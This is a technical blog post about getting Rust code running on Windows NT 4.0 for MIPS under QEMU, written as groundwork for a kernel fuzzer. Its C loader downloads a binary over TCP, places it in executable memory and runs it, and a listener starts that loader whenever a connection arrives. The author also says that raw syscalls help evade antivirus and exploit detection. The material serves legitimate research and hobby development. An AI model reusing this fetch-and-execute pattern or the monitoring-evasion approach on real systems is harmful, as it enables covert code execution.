Normal view

There are new articles available, click to refresh the page.
Before yesterdayGamozo Labs Blog

Rust on MIPS64 Windows NT 4.0

16 November 2021 at 07:00

Introduction

Some part of me has always been fascinated with coercing code to run in weird places. I scratch this itch a lot with my security research projects. These often lead me to writing shellcode to run in kernels or embedded hardware, sometimes with the only way being through an existing bug.

For those not familiar, shellcode is honestly hard to describe. I don’t know if there’s a very formal definition, but I’d describe it as code which can be run in an environment without any external dependencies. This often means it’s written directly in assembly, and directly interfaces with the system using syscalls. Usually the code can be relocated and often is represented as a flat image rather than a normal executable with multiple sections.

To me, this is extra fun as it’s effectively like operating systems development. You’re working in an environment where you need to bring most of what you need along with you. You probably want to minimize the dependencies you have on the system and libraries to increase compatibility and flexibility with the environments you run. You might have to bring your own allocator, make your own syscalls, maybe even make a scheduler if you are really trying to minimize impact.

Some of these things may seem silly, but when it comes to bypassing anti-viruses, exploit detection tools, and even mitigations, often the easiest thing to do is just avoid the common APIs that are hooked and monitored.

Streams

Before we get into it, it’s important to note that this work has been done over 3 different live streams on my Twitch! You can find these archived on my YouTube channel. Everything covered in this blog can be viewed as it happened in real time, mistakes, debugging, and all!

The 3 videos in question are:

Day 1 - Getting Rust running on Windows NT 4.0 MIPS64

Day 2 - Adding memory management and threading to our Rust on Windows NT MIPS

Day 3 - Causing NT 4.0 MIPS to bluescreen without even trying

Source

This project has spun off 3 open-source GitHub repos, one for the Rust on NT MIPS project in general, another for converting ELFs to flat images, and a final one for parsing .DBG symbol files for applying symbols to Binary Ninja or whatever tool you want symbols in! I’ve also documented the commit hashes for the repos as of this writing if things have changed since you’ve read this!

Rust on NT MIPS - 2028568

ELF loader - 30c77ca

DBG COFF parser - b7bcdbb

Don’t forget to follow me on socials and like and subscribe of course. Maybe eventually I can do research and education full time!~ Oh, also follow me on my Twitter @gamozolabs

MIPS on Windows NT

Windows NT actually has a pretty fascinating history of architecture support. It supported x86 as we know and love, but additionally it supported Alpha, ARM, and PowerPC. If you include the embedded versions of Windows there’s support for some even more exotic architectures.

MIPS is one of my favorite architectures as the simplicity makes it really fun to develop emulators for. As someone who writes a lot of emulators, it’s often one of my first targets during development, as I know it can be implemented in less than a day of work. Finding out that MIPS NT can run in QEMU was quite exciting for me. The first time I played around with this was maybe ~5 years ago, but recently I thought it’d be a fun project to demonstrate harnessing of targets for fuzzing. Not only does it have some hard problems in harnessing, as there are almost no existing tools for working with MIPS NT binaries, but it also leads us to some fun future projects where custom emulators can come into the picture!

There’s actually a fantastic series by Raymond Chen which I highly recommend you check out here.

There’s actually a few of these series by Raymond for various architectures on NT. They definitely don’t pull punches on details, definitely a fantastic read!

Running Windows NT 4.0 MIPS in QEMU

Getting NT 4.0 running in QEMU honestly isn’t too difficult. QEMU already supports the magnum machine, which runs on a R4000 MIPS processor, the first 64-bit MIPS processor, running an implementation of the MIPS III ISA. Unfortunately, out of the box it won’t quite run, as you need a BIOS/bootloader capable of booting Windows, maybe it’s video BIOS, I don’t know. You can find this here. Simply extract the file, and rename NTPROM.RAW to mipsel_bios.bin.

Other than that, QEMU will be able to just run NT 4.0 out of the box. There’s a bit of configuration you need to do in the BIOS to get it to detect your CD, and you need to configure your MAC address otherwise networking in NT doesn’t seem to work beyond a DHCP lease. Anyways, you can find more details about getting MIPS NT 4.0 running in QEMU here.

I also cover the process I use, and include my run.sh script here.

#!/bin/sh

ISO="winnt40wks_sp1_en.iso"
#ISO="./Microsoft Visual C++ 4.0a RISC Edition for MIPS (ISO)/VCPP-4.00-RISC-MIPS.iso"

qemu-system-mips64el \
    -M magnum \
    -cpu VR5432 \
    -m 128 \
    -net nic \
    -net user,hostfwd=tcp::5555-:42069 \
    -global ds1225y.filename=nvram \
    -global ds1225y.size=8200 \
    -L . \
    -hda nt4.qcow2 \
    -cdrom "$ISO"

Windows NT 4.0 running in QEMU MIPS

Getting code running on Windows NT 4.0

Surprisingly, a decent enough environment for development is readily available for NT 4.0 on MIPS. This includes symbols (included under SUPPORT/DEBUG/MIPS/SYMBOLS on the original ISO), as well as debugging tools such as ntsd, cdb and mipskd (command-line versions of the WinDbg command interface you may be familiar with), and the cherry on top is a fully working Visual Studio 4.0 install that will work right inside the MIPS guest!

With Visual Studio 4.0 we can use both the full IDE experience for building projects, but also the command line cl.exe compiler and nmake, my preferred Windows development experience. I did however use VS4 for the editor as I’m not using 1996 notepad.exe for writing code!

Unless you’re doing something really fancy, you’ll be surprised to find much of the NT APIs just work out of the box on NT4. This includes your standard way of interacting with sockets, threads, process manipulation, etc. A few years ago I wrote a snapshotting tool that used all the APIs that I would in a modern tool to dump virtual memory regions, read them, and read register contexts. It’s pretty neat!

Nevertheless, if you’re writing C or C++, other than maybe forgetting about variables having to be declared at the start of a scope, or not using your bleeding edge Windows 10 APIs, it’s really no different from modern Windows development. At least… for low level projects.

Rust and Me

After about ~10 years of writing -ansi -pedantic C, where I followed all the old fashioned rules of declaring variables at the start of scopes, verbose syntax, etc, I never would have thought I would find myself writing in a higher-level language. I dabbled in C++ but I really didn’t like the abstractions and confusion it brought, although that was arguably when I was a bit less experienced.

Nevertheless, I found myself absolutely falling in love with Rust. This was a pretty big deal for me as I have very strong requirements about understanding exactly what sort of assembly is generated from the code I write. I spend a lot of time optimizing and squeezing every bit of performance out of my code, and not having this would ruin a language for me. Something about Rust and its model of abstractions (traits) makes it actually pretty obvious what code will be generated, even for things like generics.

The first project I did in Rust was porting my hobby OS to it. Definitely a “thrown into the deep end” style project, but if Rust wasn’t suitable for operating systems development, it definitely wasn’t going to be a language I personally would want to invest in. However… it honestly worked great. After reading the Rust book, I was able to port my OS which consisted of a small hypervisor, 10gbit networking stack, and some fancy memory management, in less than a week.

Anyways, rant aside, as a low-level optimization nerd, there was nothing about Rust, even in 2016, that raised red flags about being able to replace all of my C in it. Of course, I have many complaints and many things I would change or want added to Rust, but that’s going to be the case with any language… I’m picky.

Rust on MIPS NT 4.0

Well, I do all of my projects in Rust now. Even little scripts I’d usually write in Python I often find myself grabbing Rust for. I’m comfortable with using Rust for pretty much any project at this point, that I decided that for a long-ish term stream project (ultimately a snapshot fuzzer for NT), I would want to do this in Rust.

The very first thought that comes to mind is to just build a MIPS executable from Rust, and just… run it. Well, that would be great, but unfortunately there were a few hiccups.

Rust on weird targets

Rust actually has pretty good support for weird targets. I mean, I guess we’re really just relying on, or limited by cough, LLVM. Not only can you simply pick your target by the --target triple argument to Rust and Cargo, but also when you really need control you can define a target specification. This gives you a large amount of control about the code generated.

For example:

pleb@gamey ~ $ rustc -Z unstable-options --print target-spec-json

Will give you the JSON spec for my native system, x86_64-unknown-linux-gnu

{
  "arch": "x86_64",
  "cpu": "x86-64",
  "crt-static-respected": true,
  "data-layout": "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128",
  "dynamic-linking": true,
  "env": "gnu",
  "executables": true,
  "has-elf-tls": true,
  "has-rpath": true,
  "is-builtin": true,
  "llvm-target": "x86_64-unknown-linux-gnu",
  "max-atomic-width": 64,
  "os": "linux",
  "position-independent-executables": true,
  "pre-link-args": {
    "gcc": [
      "-m64"
    ]
  },
  "relro-level": "full",
  "stack-probes": {
    "kind": "call"
  },
  "supported-sanitizers": [
    "address",
    "cfi",
    "leak",
    "memory",
    "thread"
  ],
  "target-family": [
    "unix"
  ],
  "target-pointer-width": "64"
}

As you can see, there’s a lot of control you have here. There’s plenty more options than just in this JSON as well. You can adjust your ABIs, data layout, calling conventions, output binary types, stack probes, atomic support, and so many more. This JSON can be modified as you need and you can then pass in the JSON as --target <your target json.json> to Rust, and it “just works”.

I’ve used this to generate code for targets Rust doesn’t support, like Android on MIPS (okay there’s maybe a bit of a pattern to my projects here).

Back to Rust on MIPS NT

Anyways, back to Rust on MIPS NT. Lets just make a custom spec and get LLVM to generate us a nice portable executable (PE, the .exe format of Windows)!

Should be easy!

Well… after about ~4-6 hours of tinkering. No. No it is not. In fact, we ran into an LLVM bug.

It took us some time (well, Twitch chat eventually read the LLVM code instead of me guessing) to find that the correct target triple if we wanted to get LLVM to generate a PE for MIPS would be mips64el-pc-windows-msvccoff. It’s a weird triple (mainly the coff suffix), but this is the only path we were able to find which would cause LLVM to attempt to generate a PE for MIPS. It definitely seems a bit biased towards making an ELF, but this triple indeed works…

It works at getting LLVM to try to emit a PE, but unfortunately this feature is not implemented. Specifically, inside LLVM they will generate the MIPS code, and then attempt to create the PE by calling createMCObjectStreamer. This function doesn’t actually check any of the function pointers before invoking them, and it turns out that the COFF streamer defaults to NULL, and for MIPS it’s not implemented.

Thus… we get a friendly jump to NULL:

LLVM crash backtrace in GDB

Can we add support?

The obvious answer is to quickly take the generic implementation of PE generation in LLVM and make it work for MIPS and upstream it. Well, after a deep 30 second analysis of LLVM code, it looks like this would be more work than I wanted to invest, and after all the issues up to this point my concerns were that it wouldn’t be the end of the problems.

I guess we have ELFs

Well, that leaves us with really one format that LLVM will generate MIPS for us, and that’s ELFs. Luckily, I’ve written my fair share of ELF loaders, and I decided the best way to go would simply be to flatten the ELF into an in-memory representation and make my own file format that’s easy to write a loader for.

You might think to just use a linker script for this, or to do some magic objcopy to rip out code, but unfortunately both of these have limitations. Linker scripts are fail-open, meaning if you do not specify what happens with a second, it will just “silently” be added wherever the linker would have put it by default. There (to my knowledge) is no strict mode, which means if Rust or LLVM decide to emit some section name you are not expecting, you might end up with code not being laid out as you expect.

objcopy cannot output zero-initialized BSS sections as they would be represented in-memory, so once again, this leads to an unexpected section popping up and breaking the model you expected.

Of course, with enough effort and being picky you can get a linker script to output whatever format you want, but honestly they kinda just suck to write.

Instead, I decided to just write an ELF flattener. It wouldn’t handle relocations, imports, exports, permissions or really anything. It wouldn’t even care about the architecture of the ELF or the payload. Simply, go through each LOAD section, place them at their desired address, and pad the space between them with zeros. This will give a flat in-memory representation of the binary as it would be loaded without relocations. It doesn’t matter if there’s some crazy custom assembly or sections defined, the LOAD sections are all that matters.

This tool is honestly relatively valuable for other things, as it can also flatten core dumps into a flat file if you want to inspect a core dump, which is also an ELF, with your own tooling. I’ve written this ELF loader a handful of times that I thought it would be worthwhile writing my best version if this.

The loader simply parses the absolutely required information from the ELF. This includes checking \x7FELF magic, reading the endianness (affects the ELF integer endianness), and the bitness (also affects ELF layout). Any other information in the header is ignored. Then I parse the program headers, look for any LOAD sections (sections indicated by the ELF to be loaded into memory) and make the flat file.

The ELF format is fairly simple, and the LOAD sections contain information about the permissions, virtual address, virtual size (in-memory size), file offset (location of data to initialize the memory to), and the file size (can often be less than the memory size, thus any uninitialized bytes are padded to virtual memory size with zeros).

By concatenating these sections with the correct padding, viola, we have an in-memory representation of the ELF.

I decided to make a custom FELF (“Falk ELF”) format that indicated where this blob need to be loaded into memory, and the entry point address that needed to be jumped into to start execution.

FELF0001 - Magic header
entry    - 64-bit little endian integer of the entry point address
base     - 64-bit little endian integer of the base address to load the image
<image>  - Rest of the file is the raw image, to be loaded at `base` and jumped
           into at `entry`

Simple! You can find the source code to this tool at My GitHub for elfloader. This tool also has support for making a raw file, and picking a custom base, not for relocations, but for padding out the image. For example, if you have the core dump of a QEMU guest, you can run it through this tool with elfloader --binary --base=0 <coredump> and it will produce a flat file with no headers representing all physical memory with MMIO holes and gaps padded with zero bytes. You can then mmap() the file and write your own tools to browse through a guests physical memory (or virtual if you write page table walking code)! Maybe this is a problem I only find myself running into often, but within a few days of writing this I’ve even had a coworker use it.

Anyways, enough selling you on this first cool tool we produced. We can turn an ELF into an in-memory initial representation, woohoo.

FELF loader

To load a FELF for execution on Windows, we’ll of course need to write a loader. Of course we could convert the FELF into a PE, but at this point it’s less effort for us to just use the VC4.0 installation in our guest to write a very tiny loader. All we have to do is read a file, parse a simple header, VirtualAlloc() some RWX memory at the target address, copy the payload to the memory, and jump to entry!

Unfortunately, this is where it started to start to get dicey. I don’t know if it’s my window manager, QEMU, or Windows, but very frequently my mouse would start randomly jumping around in the VM. This meant that I pretty much had to do all of my development and testing in the VM with only the keyboard. So, we immediately scrapped the idea of loading a FELF from disk, and went for network loading.

Remote code execution

As long as we configured a unicast MAC address in our MIPS BIOS (yeah, we learned the hard way that non-unicast MAC addresses randomly generated by DuckDuckGo indeed fail in a very hard to debug way), we had access to our host machine (and the internet) in the guest.

Why load from disk which would require shutting down the VM to mount the disk and copy the file into, when we could just make this a remote loader. So, that’s what we did!

We wrote a very simple client that when invoked, would connect to the server, download a FELF, load it, and execute it. This was small enough that developing this inside the VM in VC4.0 was totally fine.

#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

int
main(void)
{
	SOCKET sock;
	WSADATA wsaData;
	unsigned int len;
	unsigned char *buf;
	unsigned int off = 0;
	struct sockaddr_in sockaddr = { 0 };

	// Initialize WSA
	if(WSAStartup(MAKEWORD(2, 0), &wsaData)) {
		fprintf(stderr, "WSAStartup() error : %d", WSAGetLastError());
		return -1;
	}

	// Create TCP socket
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(sock == INVALID_SOCKET) {
		fprintf(stderr, "socket() error : %d", WSAGetLastError());
		return -1;
	}

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_addr.s_addr = inet_addr("192.168.1.2");
	sockaddr.sin_port = htons(1234);

	// Connect to the socket
	if(connect(sock, (const struct sockaddr*)&sockaddr, sizeof(sockaddr)) == SOCKET_ERROR) {
		fprintf(stderr, "connect() error : %d", WSAGetLastError());
		return -1;
	}

	// Read the payload length
	if(recv(sock, (char*)&len, sizeof(len), 0) != sizeof(len)) {
		fprintf(stderr, "recv() error : %d", WSAGetLastError());
		return -1;
	}

	// Read the payload
	buf = malloc(len);
	if(!buf) {
		perror("malloc() error ");
		return -1;
	}

	while(off < len) {
		int bread;
		unsigned int remain = len - off;
		bread = recv(sock, buf + off, remain, 0);
		if(bread <= 0) {
			fprintf(stderr, "recv(pl) error : %d", WSAGetLastError());
			return -1;
		}

		off += bread;
	}

	printf("Read everything %u\n", off);

	// FELF0001 + u64 entry + u64 base
	if(len < 3 * 8) {
		fprintf(stderr, "Invalid FELF\n");
		return -1;
	}

	{
		char *ptr = buf;
		unsigned int entry, base, hi, end;

		if(memcmp(ptr, "FELF0001", 8)) {
			fprintf(stderr, "Missing FELF header\n");
			return -1;
		}
		ptr += 8;

		entry = *((unsigned int*)ptr)++;
		hi = *((unsigned int*)ptr)++;
		if(hi) {
			fprintf(stderr, "Unhandled 64-bit address\n");
			return -1;
		}

		base = *((unsigned int*)ptr)++;
		hi = *((unsigned int*)ptr)++;
		if(hi) {
			fprintf(stderr, "Unhandled 64-bit address\n");
			return -1;
		}

		end = base + (len - 3 * 8);
		printf("Loading at %x-%x (%x) entry %x\n", base, end, end - base, entry);

		{
			unsigned int align_base = base & ~0xffff;
			unsigned int align_end  = (end + 0xffff) & ~0xffff;
			char *alloc = VirtualAlloc((void*)align_base,
				align_end - align_base, MEM_COMMIT | MEM_RESERVE,
				PAGE_EXECUTE_READWRITE);
			printf("Alloc attempt %x-%x (%x) | Got %p\n",
				align_base, align_end, align_end - align_base, alloc);
			if(alloc != (void*)align_base) {
				fprintf(stderr, "VirtualAlloc() error : %d\n", GetLastError());
				return -1;
			}

			// Copy in the code
			memcpy((void*)base, ptr, end - base);
		}

		// Jump to the entry
		((void (*)(SOCKET))entry)(sock);
	}

	return 0;
}

It’s not the best quality code, but it gets the job done. Nevertheless, this allows us to run whatever Rust program we develop in the VM! Running this client executable is all we need now.

Remote remote code execution

Unfortunately, having to switch to the VM, hit up arrow, and enter, is honestly a lot more than I want to have in my build process. I kind of think any build, dev, and test cycle that takes longer than a few seconds is just too painful to use. I don’t really care how complex the project is. In Chocolate Milk I demonstrated that I could build, upload to my server, hot replace, download Windows VM images, and launch hundreds of Windows VMs as part of my sub-2-second build process. This is an OS and hypervisor with hotswapping and re-launching of hundreds of Windows VMs in seconds (I think milliseconds for the upload, hot swap, and Windows VM launches if you ignore the 1-2 second Rust build). There’s just no excuse for shitty build and test processes for small projects like this.

Okay, very subtle flex aside, we need a better process. Luckily, we can remotely execute our remote code. To do this I created a server that runs inside the guest that waits for connections. On a connection it simply calls CreateProcess() and launches the client we talked about before. Now, we can “poke” the guest by simply connecting and disconnecting to the TCP port we forwarded.

#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

int
main(void)
{
	SOCKET sock;
	WSADATA wsaData;
	struct sockaddr_in sockaddr = { 0 };

	// Initialize WSA
	if(WSAStartup(MAKEWORD(2, 0), &wsaData)) {
		fprintf(stderr, "WSAStartup() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Create TCP socket
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(sock == INVALID_SOCKET) {
		fprintf(stderr, "socket() error : %d\n", WSAGetLastError());
		return -1;
	}

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
	sockaddr.sin_port = htons(42069);

	if(bind(sock, (const struct sockaddr*)&sockaddr, sizeof(sockaddr)) == SOCKET_ERROR) {
		fprintf(stderr, "bind() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Listen for connections
	if(listen(sock, 5) == SOCKET_ERROR) {
		fprintf(stderr, "listen() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Wait for a client
	for( ; ; ) {
		STARTUPINFO si = { 0 };
		PROCESS_INFORMATION pi = { 0 };
		SOCKET client = accept(sock, NULL, NULL);

		// Upon getting a TCP connection, just start
		// a separate client process. This way the
		// client can crash and burn and this server
		// stays running just fine.
		CreateProcess(
			"client.exe",
			NULL,
			NULL,
			NULL,
			FALSE,
			CREATE_NEW_CONSOLE,
			NULL,
			NULL,
			&si,
			&pi
		);

		// We don't even transfer data, we just care about
		// the connection kicking off a client.
		closesocket(client);
	}

	return 0;
}

Very fancy code. Anyways with this in place, now we can just add a nc -w 0 127.0.0.1 5555 to our Makefile, and now the VM will download and run the new code we build. Combine this with cargo watch and now when we save one of the Rust files we’re working on, it’ll build, poke the VM, and run it! A simple :w and we have instant results from the VM!

(If you’re wondering, we create the client in a different process so we don’t lose the server if the client crashes, which it will)

Rust without OS support

Rust is designed to have a split of some of the core features of the language. There’s core which contains the bare essentials to have a usable language, alloc which gives you access to dynamic allocations, and std which gives you a OS-agnostic wrapper of common OS-level constructions like files, threads, and sockets.

Unfortunately, Rust doesn’t have support for NT4.0 on MIPS, so we immediately don’t have the ability to use std. However, we can still use core and alloc with a small amount of work.

Rust has one of the best cross-compiling supports of any compiler, as you can simply have Rust build core for your target, even if you don’t have the pre-compiled package. core is simple enough that it’s a few second build process, so it doesn’t really complicate your build. Seriously, look how cool this is:

cargo new --bin rustexample
#![no_std]
#![no_main]

#[panic_handler]
fn panic_handler(_info: &core::panic::PanicInfo) -> ! {
    loop {}
}

#[no_mangle]
pub unsafe extern fn __start() -> ! {
    unimplemented!();
}
pleb@gamey ~/rustexample $ cargo build --target mipsel-unknown-none -Zbuild-std=core
   Compiling core v0.0.0 (/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core)
   Compiling compiler_builtins v0.1.49
   Compiling rustc-std-workspace-core v1.99.0 (/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/rustc-std-workspace-core)
   Compiling rustexample v0.1.0 (/home/pleb/rustexample)
    Finished dev [unoptimized + debuginfo] target(s) in 8.84s

And there you go, you have a Rust binary for mipsel-unknown-none without having to download any pre-built toolchains, a libc, anything. You can immediately start building your program, using Rust-level constructs like slices and arrays with bounds checking, closures, whatever. No libc, no pre-built target-specific toolchains, nothing.

OS development in user-land

For educational reasons, and totally not because I just find it more fun, I decided that this project would not leverage the existing C libraries we have that do indeed exist in the MIPS guest. We could of course write PE importers to leverage the existing kernel32.dll and user32.dll present in all Windows processes by default, but no, that’s not fun. We can justify this by saying that the goal of this project is to fuzz the NT kernel, and thus we need to understand what syscalls look like.

So, with that in mind, we’re basically on our own. We’re effectively writing an OS in user-land, as we have absolutely no libraries or features by default. We have to write our inline assembly and work with raw pointers to bootstrap our execution environment for Rust.

The very first thing we need is a way of outputting debug information. I don’t care how we do this. It could be a file, a socket, the stdout, who cares. To do this, we’ll need to ask the kernel to do something via a syscall.

Syscall Layer

To invoke syscalls, we need to conform to a somewhat “custom” calling convention. System calls effectively are always indexed by some integer, selecting the API that you want to invoke. In the case of MIPS this is put into the $v0 register, which is not normally used as a calling convention. Thus, to perform a syscall with this modified convention, we have to use some assembly. Luckily, the rest of the calling convention for syscalls is unmodified from the standard MIPS o32 ABI, and we can pass through everything else.

To pass everything as is to the syscall we actually have to make sure Rust is using the same ABI as the kernel, we do this by declaring our function as extern, which switches us to the default MIPS o32 C ABI. Technically I think Windows does floating point register passing different than o32, but we’ll cross that bridge when we get there.

We need to be confident that the compiler is not emitting some weird prologue or moving around registers in our syscall function, and luckily Rust comes to the rescue again with a #[naked] function decorator. This marks the function as never inline-able, but also guarantees that no prolog or epilog are present in the function. This is common in a lot of low level languages, but Rust goes a step further and requires that naked functions only contain a single assembly statement that must not return (you must manually handle the return), and that your assembly is the first code that executes. Ultimately, it’s really just a global label on inline assembly with type information. Sweet.

So, we simply have to write a syscall helper for each number of arguments we want to support like such:

/// 2-argument syscall
#[allow(unused)]
#[naked]
pub unsafe extern fn syscall2(_: usize, _: usize, id: usize) -> usize {
    asm!(r#"
        move $v0, $a2
        syscall
    "#, options(noreturn));
}

We mark the function as naked, pass in the syscall ID as the last parameter (as to not disturb the ordering of the earlier parameters which we pass through to the syscall), move the syscall ID to $v0, and invoke the syscall. Weirdly, for MIPS, the syscall does not return to the instruction after the syscall, it actually returns to $ra, the return address, so it’s critical that the function is never inlined as this wrapper relies on returning back to the call site of the caller of syscall2(). Luckily, naked ensures this for us, and thus this wrapper is sufficient for syscalls!

Getting output

Back to the console, we initially started with trying to do stdout, but according to Twitch chat it sounds like old Windows this was actually done via some RPC with conhost. So, we abandoned that. We wrote a tiny example of using a NtOpenFile() and NtWriteFile() syscall to drop a file to disk with a log, and this was a cool example of early syscalls, but still not convenient.

Remember, I’m picky about the development cycle.

So, we decided to go with a socket for our final build. Unfortunately, creating a socket in Windows via syscalls is actually pretty hard (I think it’s done mainly over IOCTLs), but we cheated here and just passed the handle from the FELF loader that already had to connect to our host. We can simply change our FELF server to serve the FELF to the VM and then recv() forever, printing out the console output. Now we have a remote console output.

Windows Syscalls

Windows syscalls are a lot heavier than what you might be used to on UNIX, they are also sometimes undocumented. Luckily, the NtWriteFile() syscall that we really need is actually not too bad. It takes a file handle, some optional stuff we don’t care about, an IO_STATUS_BLOCK (which returns number of bytes written), a buffer, a length, and an offset in the file to write to.

/// Write to a file
pub fn write(fd: &Handle, bytes: impl AsRef<[u8]>) -> Result<usize> {
    let mut offset = 0u64;
    let mut iosb = IoStatusBlock::default();

    // Perform syscall
    let status = NtStatus(unsafe {
        syscall9(
            // [in] HANDLE FileHandle
            fd.0,

            // [in, optional] HANDLE Event
            0,

            // [in, optional] PIO_APC_ROUTINE ApcRoutine,
            0,

            // [in, optional] PVOID ApcContext,
            0,

            // [out] PIO_STATUS_BLOCK IoStatusBlock,
            addr_of_mut!(iosb) as usize,

            // [in] PVOID Buffer,
            bytes.as_ref().as_ptr() as usize,

            // [in] ULONG Length,
            bytes.as_ref().len(),

            // [in, optional] PLARGE_INTEGER ByteOffset,
            addr_of_mut!(offset) as usize,

            // [in, optional] PULONG Key
            0,

            // Syscall number
            Syscall::WriteFile as usize)
    } as u32);

    // If success, return number of bytes written, otherwise return error
    if status.success() {
        Ok(iosb.information)
    } else {
        Err(status)
    }
}

Rust print!() and formatting

To use Rust in the best way possible, we want to have support for the print!() macro, this is the printf() of the Rust world. It happens to be really easy to add support for!

/// Writer structure that simply implements [`core::fmt::Write`] such that we
/// can use `write_fmt` in our [`print!`]
pub struct Writer;

impl core::fmt::Write for Writer {
    fn write_str(&mut self, s: &str) -> core::fmt::Result {
        let _ = crate::syscall::write(unsafe { &SOCKET }, s);

        Ok(())
    }
}

/// Classic `print!()` macro
#[macro_export]
macro_rules! print {
    ($($arg:tt)*) => {
        let _ = core::fmt::Write::write_fmt(
            &mut $crate::print::Writer, core::format_args!($($arg)*));
    }
}

Simply create a dummy structure, implement core::fmt::Write on it, and now you can directly use Write::write_fmt() to write format strings. All you have to do is implement a sink for &strs, which is really just a char* and a length. In our case, we invoke the NtWriteFile() syscall with our socket we saved from the client.

Viola, we have remote output in a nice development environment:

pleb@gamey ~/mipstest $ felfserv 0.0.0.0:1234 ./out.felf


Serving 6732 bytes to 192.168.1.2:45914
---------------------------------
Hello world from Rust at 0x13370790
fn main() -> Result<(), ()> {
    println!("Hello world from Rust at {:#x}", main as usize);
    Ok(())
}

It’s that easy!

Memory allocation

Now that we have the basic ability to print things and use Rust, the next big feature that we’re missing is the ability to dynamically allocate memory. Luckily, we talked about the alloc feature of Rust before. Now, alloc isn’t something you get for free. Rust doesn’t know how to allocate memory in the environment you’re running it in, so you need to implement an allocator.

Luckily, once again, Rust is really friendly here. All you have to do is implement the GlobalAlloc trait on a global structure. You implement an alloc() function which takes in a Layout (size and alignment) and returns a *mut u8, NULL on failure. Then you have a dealloc() where you get the pointer that was used for the allocation, the Layout again (actually really nice to know the size of the allocation at free() time) and that’s it.

Since we don’t care too much about the performance of our dynamic allocator, we’ll just pass this information through directly to the NT kernel by doing virtual memory maps and frees.

use alloc::alloc::{Layout, GlobalAlloc};

/// Implementation of the global allocator
struct GlobalAllocator;

/// Global allocator object
#[global_allocator]
static GLOBAL_ALLOCATOR: GlobalAllocator = GlobalAllocator;

unsafe impl GlobalAlloc for GlobalAllocator {
    unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
        crate::syscall::mmap(0, layout.size()).unwrap_or(core::ptr::null_mut())
    }
    
    unsafe fn dealloc(&self, addr: *mut u8, _layout: Layout) {
        crate::syscall::munmap(addr as usize)
            .expect("Failed to deallocate memory");
    }
}

As for the syscalls, they’re honestly not too bad for this either that I won’t go into more detail. You’ll notice these are similar to VirtualAlloc() that is a common API in Windows development.

/// Allocate virtual memory in the current process
pub fn mmap(mut addr: usize, mut size: usize) -> Result<*mut u8> {
    /// Commit memory
    const MEM_COMMIT: u32 = 0x1000;

    /// Reserve memory range
    const MEM_RESERVE: u32 = 0x2000;

    /// Readable and writable memory
    const PAGE_READWRITE: u32 = 0x4;

    // Perform syscall
    let status = NtStatus(unsafe {
        syscall6(
            // [in] HANDLE ProcessHandle,
            !0,

            // [in, out] PVOID *BaseAddress,
            addr_of_mut!(addr) as usize,

            // [in] ULONG_PTR ZeroBits,
            0,

            // [in, out] PSIZE_T RegionSize,
            addr_of_mut!(size) as usize,

            // [in] ULONG AllocationType,
            (MEM_COMMIT | MEM_RESERVE) as usize,

            // [in] ULONG Protect
            PAGE_READWRITE as usize,

            // Syscall ID
            Syscall::AllocateVirtualMemory as usize,
        )
    } as u32);

    // If success, return allocation otherwise return status
    if status.success() {
        Ok(addr as *mut u8)
    } else {
        Err(status)
    }
}
    
/// Release memory range
const MEM_RELEASE: u32 = 0x8000;

/// De-allocate virtual memory in the current process
pub unsafe fn munmap(mut addr: usize) -> Result<()> {
    // Region size
    let mut size = 0usize;

    // Perform syscall
    let status = NtStatus(syscall4(
        // [in] HANDLE ProcessHandle,
        !0,

        // [in, out] PVOID *BaseAddress,
        addr_of_mut!(addr) as usize,

        // [in, out] PSIZE_T RegionSize,
        addr_of_mut!(size) as usize,

        // [in] ULONG AllocationType,
        MEM_RELEASE as usize,

        // Syscall ID
        Syscall::FreeVirtualMemory as usize,
    ) as u32);

    // Return error on error
    if status.success() {
        Ok(())
    } else {
        Err(status)
    }
}

And viola. Now we can use Strings, Boxs, Vecs, BTreeMaps, and a whole list of other standard data structures in Rust. At this point, other than file I/O, networking, and threading, this environment is probably capable of running pretty much any generic Rust code, just by implementing two simple allocation functions. How cool is that!?

Threading

Some terrible person in my chat just had to ask “what about threading support”. Of course, this could be an off handed comment that I dismiss or laugh at, but yeah, what about threading? After all, we want to write a fuzzer, and without threads it’ll be hard to hit those juicy, totally necessary on 1996 software, race conditions?!

Well, this threw us down a huge loop. First of all, how do we actually create threads in Windows, and next, how do we do it in a Rust-style way of using closures that can be join()ed to get the return result.

Creating threads on Windows

Unfortunately, creating threads on Windows requires the NtCreateThread() syscall. This is not documented, and honestly took a pretty long time to figure out. You don’t actually give it a function pointer to execute and a parameter like most thread creation libraries at a higher level.

Instead, you actually give it an entire CONTEXT. In Windows development, the CONTEXT structure is a very-specific-to-your-architecture structure that contains all of the CPU register state. So, you actually have to figure out the correct CONTEXT shape for your architecture (usually there are multiple, controlled by heavy #ifdefs). This might have taken us an hour to actually figure out, I don’t remember.

On top of this, you also provide it the stack register. Yep, you heard that right, you have to create the stack for the thread. This is yet another step that I wasn’t really expecting that added to the complexity.

Anyways, at the end of the day, you launch a new thread in your process, you give it a CPU context (and by nature a stack and target entry address), and let it run off and do its thing.

However, this isn’t very Rust-like. Rust allows you to optionally join() on a thread to get the return result from it, further, threads are started as closures so you can pass in arbitrary parameters to the thread with super convenient syntax either by move or by reference.

Threading in Rust

This leads to a hard-ish problem. How do we get Rust-style threads? Until we wrote this, I never really even thought about it. Initially we thought about some fancy static ways of doing it, but ultimately, due to using closures, you must put information on the heap. It’s obvious in hindsight, but if you want to move ownership of some of your stack locals into this thread, how are you possibly going to do that without storing it somewhere. You can’t let the thread use the parents stack, that wouldn’t work to well.

So, we implemented a spawn routine that would take in a closure (with the same constraints of Rust’s own std::thread::spawn), put the closure into a Box, turning it into a dynamically dispatched trait (vftables and friends), while moving all of the variables captured by the closure into the heap.

